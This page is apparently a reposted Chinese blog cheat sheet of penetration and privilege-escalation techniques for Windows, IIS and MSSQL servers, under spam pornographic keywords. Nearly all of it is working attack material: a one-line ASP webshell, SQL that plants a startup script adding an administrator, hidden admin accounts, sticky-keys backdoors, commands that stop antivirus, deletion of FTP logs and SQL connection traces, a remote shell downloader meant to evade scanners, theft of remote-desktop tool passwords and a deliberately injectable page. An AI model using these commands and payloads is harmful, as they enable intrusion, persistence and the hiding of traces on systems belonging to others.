国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費(fèi)電子書(shū)等14項(xiàng)超值服

開(kāi)通VIP
各種滲透,提權(quán)的經(jīng)驗(yàn)和技巧總結(jié)(上)
旁站路徑問(wèn)題:
1、讀網(wǎng)站配置。

2、用以下VBS:

 

On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
WScript.Quit
End If
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
Next
WScript.Echo “Path : ” & VDirObj.Path
End If
Next

3、iis_spy 列舉(注:需要支持ASPX,反IISSPY的方法:將 activeds.dll,activeds.tlb 降權(quán))。

4、得到目標(biāo)站目錄,不能直接跨的。可以通過(guò)“echo ^<%execute(request(“cmd”))%^> >>X:\目標(biāo)目錄\X.asp”或者“copy 腳本文件 X:\目標(biāo)目錄\X.asp”像目標(biāo)目錄寫(xiě)入webshell,或者還可以試試type命令。

 

 

WordPress 的平臺(tái),爆絕對(duì)路徑的方法是:

url/wp-content/plugins/akismet/akismet.php
url/wp-content/plugins/akismet/hello.php

 

 

 

phpMyAdmin 爆路徑辦法:

phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php

 

 

 

網(wǎng)站可能目錄(注:一般是虛擬主機(jī)類(lèi)):

data/htdocs.網(wǎng)站/網(wǎng)站/

 

 

 

CMD 下操作 VPN 相關(guān)知識(shí)、資料:

#允許administrator撥入該VPN:
netsh ras set user administrator permit

#禁止administrator撥入該VPN:
netsh ras set user administrator deny

#查看哪些用戶可以撥入VPN:
netsh ras show user

#查看VPN分配IP的方式:
netsh ras ip show config

#使用地址池的方式分配IP:
netsh ras ip set addrassign method = pool

#地址池的范圍是從192.168.3.1到192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254

 

 

 

Cmd、Dos 命令行下添加 SQL 用戶的方法:

需要有管理員權(quán)限,在命令下先建立一個(gè)“c:\test.qry”文件,內(nèi)容如下:

exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember ‘test, ‘sysadmin’

然后在DOS下執(zhí)行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

另類(lèi)的加用戶方法:

在刪掉了 net.exe 和不用 adsi 之外,新的加用戶的方法。代碼如下:

js:
var o=new ActiveXObject( “Shell.Users” );
z=o.create(“test”) ;
z.changePassword(“123456″,””)
z.setting(“AccountType”)=3;

vbs:
Set o=CreateObject( “Shell.Users” )
Set z=o.create(“test”)
z.changePassword “123456”,””
z.setting(“AccountType”)=3

 

 

 

Cmd 訪問(wèn)控制權(quán)限控制:

命令如下:

cacls c: /e /t /g everyone:F #c盤(pán)everyone權(quán)限
cacls “目錄” /d everyone #everyone不可讀,包括admin

備注:

反制方法,在文件夾安全設(shè)置里將 Everyone 設(shè)定為不可讀,如果沒(méi)有安全性選項(xiàng):工具 – 文件夾選項(xiàng) – 使用簡(jiǎn)單的共享去掉即可。

 

 

 

3389 相關(guān),以下配合PR更好:

a、防火墻TCP/IP篩選.(關(guān)閉:net stop policyagent & net stop sharedaccess)
b、內(nèi)網(wǎng)環(huán)境(lcx.exe)
c、終端服務(wù)器超出了最大允許連接(XP 運(yùn)行:mstsc /admin;2003 運(yùn)行:mstsc /console)

1.查詢終端端口:

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber

2.開(kāi)啟XP&2003終端服務(wù):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改終端端口為2008(十六進(jìn)制為:0x7d8):

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取消xp&2003系統(tǒng)防火墻對(duì)終端服務(wù)的限制及IP連接的限制:

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

create table a (cmd text);
insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”);
insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”);
select * from a into outfile “C:\\Documents and Settings\\All Users\\「開(kāi)始」菜單\\程序\\啟動(dòng)\\a.vbs”;

BS馬的PortMap功能,類(lèi)似LCX做轉(zhuǎn)發(fā)。若果支持ASPX,用這個(gè)轉(zhuǎn)發(fā)會(huì)隱蔽點(diǎn)。(注:一直忽略了在偏僻角落的那個(gè)功能)

 

 

 

關(guān)閉常見(jiàn)殺軟(把殺軟所在的文件的所有權(quán)限去掉):

處理變態(tài)諾頓企業(yè)版:

net stop “Symantec AntiVirus” /y
net stop “Symantec AntiVirus Definition Watcher” /y
net stop “Symantec Event Manager” /y
net stop “System Event Notification” /y
net stop “Symantec Settings Manager” /y

麥咖啡:net stop “McAfee McShield”

Symantec病毒日志:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs

Symantec病毒備份:
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

Nod32病毒備份:
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine

Nod32移除密碼保護(hù):
刪除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可

 

 

 

安裝5次shift后門(mén),沾滯鍵后門(mén),替換SHIFT后門(mén):

5次SHIFT,沾滯鍵后門(mén):
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

替換SHIFT后門(mén):
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

 

 

 

添加隱藏系統(tǒng)賬號(hào):

1、執(zhí)行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
2、導(dǎo)出注冊(cè)表SAM下用戶的兩個(gè)鍵值。
3、在用戶管理界面里的 admin$ 刪除,然后把備份的注冊(cè)表導(dǎo)回去。
4、利用 Hacker Defender 把相關(guān)用戶注冊(cè)表隱藏。

 

 

 

安裝 MSSQL 擴(kuò)展后門(mén):

USE master;
EXEC sp_addextendedproc ‘xp_helpsystem’, ‘xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;

 

 

 

處理服務(wù)器MSFTP日志:

在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三個(gè)文件,直接刪除 ex0111124.log 不成功,顯示“原文件…正在使用”。

當(dāng)然可以直接刪除“ex011120.log / ex011121.log”。然后用記事本打開(kāi)“ex0111124.log”,刪除里面的一些內(nèi)容后,保存,覆蓋退出,成功。

當(dāng)停止“msftpsvc”服務(wù)后可直接刪除“ex011124.log”。

 

 

 

MSSQL查詢分析器連接記錄清除:

MSSQL 2000 位于注冊(cè)表如下:

HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

找到接接過(guò)的信息刪除。

MSSQL 2005 是在:

C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

 

 

 

防BT系統(tǒng)攔截技巧,可以使用遠(yuǎn)程下載shell:

 

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject(“Microsoft.XMLHTTP”)
With Retrieval
.Open “Get”, s_RemoteFileUrl, False, “”, “”
.Send
GetRemoteData = .ResponseBody
End With
Set Retrieval = Nothing
Set Ads = Server.CreateObject(“Adodb.Stream”)
With Ads
.Type = 1
.Open
.Write GetRemoteData
.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
End With
Set Ads = Nothing
End Sub

eWebEditor_SaveRemoteFile “your shell’s name“, “your shell’urL
%>

防BT系統(tǒng)攔截技巧,可以使用遠(yuǎn)程下載shell,也達(dá)到了隱藏自身的效果,也可以做為超隱蔽的后門(mén),神馬的免殺webshell,用服務(wù)器安全工具一掃通通掛掉了。

 

 

 

VNC、Radmin、PcAnywhere 的提權(quán)方法:

首先利用 shell 讀取 vnc 保存在注冊(cè)表中的密文,然后再使用工具VNC4X破解。

注冊(cè)表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

Radmin 默認(rèn)端口是4899,先獲取密碼和端口,如下位置:

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默認(rèn)密碼注冊(cè)表位置

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默認(rèn)端口注冊(cè)表位置

然后用HASH版連接。

如果我們拿到一臺(tái)主機(jī)的WEBSEHLL。通過(guò)查找發(fā)現(xiàn)其上安裝有 PcAnywhere 同時(shí)保存密碼文件的目錄是允許我們的IUSER權(quán)限訪問(wèn),我們可以下載這個(gè)CIF文件到本地破解,再通過(guò) PcAnywhere 從本機(jī)登陸服務(wù)器。

保存密碼的CIF文件,不是位于PcAnywhere的安裝目錄,而且位于安裝PcAnywhere所安裝盤(pán)的:

“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”

如果PcAnywhere安裝在“D:\program\”文件夾下,那么PcAnywhere的密碼文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夾下。

 

 

 

搜狗輸入法 PinyinUp.exe 提權(quán):

搜狗輸入法的“PinyinUp.exe”是可讀可寫(xiě)的直接替換即可,位于搜狗安裝目錄下,例如:

“C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe”

搜狗拼音輸入法,會(huì)定時(shí)調(diào)用這個(gè)文件進(jìn)行升級(jí),禁止還禁止不掉,呵呵,天然的后門(mén)。

 

 

 

WinWebMail 提權(quán)加用戶:

WinWebMail目錄下的web必須設(shè)置everyone權(quán)限可讀可寫(xiě),在開(kāi)始程序里,找到WinWebMail快捷方式,接下來(lái),看路徑,訪問(wèn)“路徑\web”傳 shell,訪問(wèn)shell后,權(quán)限是system,直接放遠(yuǎn)控進(jìn)啟動(dòng)項(xiàng),等待下次重啟。

沒(méi)有刪cmd組件的可以直接加用戶,7i24的web目錄也是可寫(xiě),權(quán)限為administrator。

 

 

 

1433 SA權(quán)限構(gòu)建注入點(diǎn):

<%
strSQLServerName = “服務(wù)器ip”
strSQLDBUserName = “數(shù)據(jù)庫(kù)賬號(hào)”
strSQLDBPassword = “數(shù)據(jù)庫(kù)密碼”
strSQLDBName = “數(shù)據(jù)庫(kù)名稱”
Set conn = server.CreateObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;”
conn.open strCon
Dim rs, strSQL, id
Set rs = server.CreateObject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from ACTLIST where worldid=” & idrs.open strSQL,conn,1,3
rs.Close
%>

本站內(nèi)容均為原創(chuàng),轉(zhuǎn)載請(qǐng)務(wù)必保留署名與鏈接!

本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
1433 sa弱口令相關(guān)命令 - 黑白網(wǎng)絡(luò)
如何打造一個(gè)安全的WEB服務(wù)器
幾種可以提權(quán)的辦法
如何應(yīng)對(duì)new ActiveXObject(“WScript.Shell”)創(chuàng)建失敗的問(wèn)題
電腦使用常見(jiàn)問(wèn)題整理
Windows2003服務(wù)器安裝及設(shè)置教程——文件及文件夾權(quán)限篇一
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服